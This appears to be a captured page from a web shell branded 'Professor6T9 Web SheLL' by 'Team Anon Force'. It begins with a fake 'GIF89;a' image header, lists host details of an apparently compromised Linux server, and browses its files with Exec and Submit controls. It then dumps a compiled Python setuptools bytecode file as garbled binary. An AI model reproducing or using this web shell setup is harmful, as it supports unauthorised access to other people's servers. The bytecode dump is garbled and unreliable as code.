GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux SamCT211 4.4.302+ #86009 SMP Wed Nov 26 18:19:20 CST 2025 x86_64
nginx/1.23.1
192.168.4.211
/
volume1
/
@appstore
/
Contacts
/
radicale
/
site-packages
/
setuptools
/
_distutils
/
command
/
__pycache__
[ HOME ]
Exec
Submit
install_scripts.cpython-38.pyc
U �}�h� � @ sD d Z ddlZddlmZ ddlmZ ddlmZ G dd� de�ZdS ) zudistutils.command.install_scripts Implements the Distutils 'install_scripts' command, for installing Python scripts.� N)�log)�ST_MODE� )�Commandc @ sL e Zd ZdZddddgZddgZdd � Zd d� Zdd � Zdd� Z dd� Z dS )�install_scriptsz%install scripts (Python or otherwise))zinstall-dir=�dzdirectory to install scripts to)z build-dir=�bz'build directory (where to install from))�force�fz-force installation (overwrite existing files))� skip-buildNzskip the build stepsr r c C s d | _ d| _d | _d | _d S )NF)�install_dirr � build_dir� skip_build��self� r �T/tmp/pip-target-k_nuic9h/lib/python/setuptools/_distutils/command/install_scripts.py�initialize_options s z"install_scripts.initialize_optionsc C s | � dd� | � dddd� d S )N�build)� build_scriptsr �install)r r )r r )r r )�set_undefined_optionsr r r r �finalize_options! s �z install_scripts.finalize_optionsc C s� | j s| �d� | �| j| j�| _tjdkr~| �� D ]H}| j rLt �d|� q4t�|�t dB d@ }t �d||� t�||� q4d S )Nr �posixzchanging mode of %sim i� zchanging mode of %s to %o)r �run_command� copy_treer r �outfiles�os�name�get_outputs�dry_runr �info�statr �chmod)r �file�moder r r �run* s zinstall_scripts.runc C s | j jp g S �N)�distribution�scriptsr r r r � get_inputs9 s zinstall_scripts.get_inputsc C s | j pg S r'